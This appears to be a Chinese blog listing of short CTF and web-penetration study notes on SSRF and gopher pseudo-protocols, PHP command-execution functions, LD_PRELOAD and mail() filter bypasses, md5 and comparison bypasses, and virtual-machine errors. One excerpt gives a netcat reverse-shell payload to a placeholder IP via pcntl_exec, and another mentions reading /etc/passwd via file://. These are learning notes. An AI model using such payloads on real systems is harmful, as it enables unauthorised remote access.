- 博客(13)
- 收藏
- 关注
原创 [web渗透]gopher伪协议
然后将上述内容利用burp跟在url后面(不要忘了url本身后面需要一个字符进行占位)发送,在发送的过程中抓包,将这些内容进行两次url编码再发送。用途:通常情况下,我们无法从局域网外的主机向内网的主机直接发送POST请求,但是可以使用gopher伪协议发送。需要注意的点:gopher协议默认的端口为70,因此正常访问是需要加上端口号80。gopher特点:可以用于不同提交方式的数据流提交,比如POST提交。gopher协议:http协议的前身,现如今基本不再使用。而POST则需要四个参数。
2024-07-26 17:28:35
110
原创 SSRF伪协议
学习自从文件系统中获取文件内容,如file:///etc/passwd可用于端口扫描SSH文件传输协议或安全文件传输协议轻量级目录访问协议简单文件传输协议分布式文档传输协议。
2024-07-26 15:01:45
500
原创 pcntl_exec函数
举例:我们需要执行ls命令,那么payload=pcntl_exec("/bin/bash","nc xxx.xxx.xxx.xxx yyyy -e /bin/bash");:我们执行一个shell命令,比如ls,这个命令肯定是从linux系统的某个文件中获取的,这里的path就是文件的位置。由于函数本身没有回显,所以需要通过shell反弹来查看。使用限制:此函数未被禁用,可通过phpinfo查看。其中xxx.xxx.xxx.xxx是ip地址,:就是我们需要传给程序的参数的字符串数组。
2024-07-24 22:15:56
185
原创 mail函数绕过
所有命令执行函数都被禁了,mail函数可用,putenv文件可用,蚁剑连接成功,可以上传文件。:控制脚本能够执行php文件,要求php文件中执行mail函数。能够对目标服务器传入.so文件。在.so文件中自定义getuid函数。最后将php文件和.so文件都传入目标机器。运行php文件。
2024-07-24 15:50:18
272
原创 LD_PRELOAD绕过php命令执行过滤原理
LD_PRELOAD是一个在Linux/Unix系统中的环境变量,它允许程序在启动前预加载一个或多个共享库(通常是.so文件)到程序的地址空间中。库,顾名思义就是用来存放东西的地方,在程序执行这块,就是用来存储程序将要用到的各种函数。这里主要指动态链接库,详细的内容请百度看看程序编译过程。库里存放了程序执行可能要用到的各种函数。当程序执行时,遇到某个要执行的函数,就会从库中寻找对应的函数。
2024-07-23 03:12:25
965
原创 [php命令执行函数]详解各种php命令执行函数
return_var:可选参数,整数类型,&表示可以通过引用的方式来在函数执行结束之后修改这个值,如果提供此参数,则command命令执行之后的返回状态会被放置到return_var函数内。return_var:可选参数,整数类型,如果提供此参数,则command命令执行之后的返回状态会被放置到return_var函数内。return_var:可选变量,如果选择,就会将命令是否执行成功的结果填入此变量,成功为0,失败为1。command:必选参数,字符类型,被system函数执行的命令,如ls。
2024-07-18 18:56:03
430
原创 [ctf web]system函数详解[php命令执行函数][web渗透]
return_var:可选参数,整数类型,如果提供此参数,则command命令执行之后的返回状态会被放置到return_var函数内。返回0表示执行成功,返回1表示执行失败。command:必选参数,字符类型,被system函数执行的命令,如ls。system函数简介:用于执行命令。system函数默认有回显。
2024-07-18 16:19:19
142
原创 [md5强比较]一文轻松搞懂md5强比较,绕过方法
再加上此处是强比较,md5有个特点,处理数组时会返回NULL。所以我们可以让a[]=1,b[]=2。总结要求:a和b都存在。以小学期的一题为例,a和b的md5值相等。
2024-07-11 23:21:32
266
原创 if($b>1234)[php]比较大小绕过
对于字符串,比如a='0',字符串在进行比较值的时候会被当作0处理。而且同时a='0'本身会被当作真值处理,这样就满足了if($a==0&&$a),而a=0虽然值为0,但是由于是数值,会被当作假值处理,也就是$a为布尔值0。前面说过,字符串的值会被当作0,这里的1235c就会变成1235来进行大小比较,这样既绕过b不能是数字的限制,又大于1234。所以此处输入a='0'可以绕过。当然也可以是任意字符,比如'。在php中a='0'和a=0是不一样的,前者是字符串,后者是数值。小学期的一道题,特此记录。
2024-07-11 23:08:02
194
原创 【RCE】call_user_func($a,$b)($c);php中call_user_func有三个参数的使用方法;array_pop()解决
遇到call_user_func后面有三个参数,普通的system(ls)无法执行。这时候需要使用array_pop()函数来让数组中最后一个元素出栈,让其变成命令。入下题:b通过get方法,获取所有get方式的结果并且写进一个数组中,接着在call_user_func处又将b作为参数。
2024-07-07 21:27:02
259
原创 PXE-M0F:Exiting Intel PXE ROM Operating System not found
配置虚拟机报错:PXE-M0F:Exiting Intel PXE ROM Operating System not found。
2024-07-07 19:50:46
199
原创 无法连接虚拟设备 ide1:0,因为主机上没有相应的设备。 您要在每次开启此虚拟机时都尝试连接此虚拟设备吗?
虚拟机打开过程中显示:无法连接虚拟设备 ide1:0,因为主机上没有相应的设备。您要在每次开启此虚拟机时都尝试连接此虚拟设备吗?
2024-07-07 19:43:00
200
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人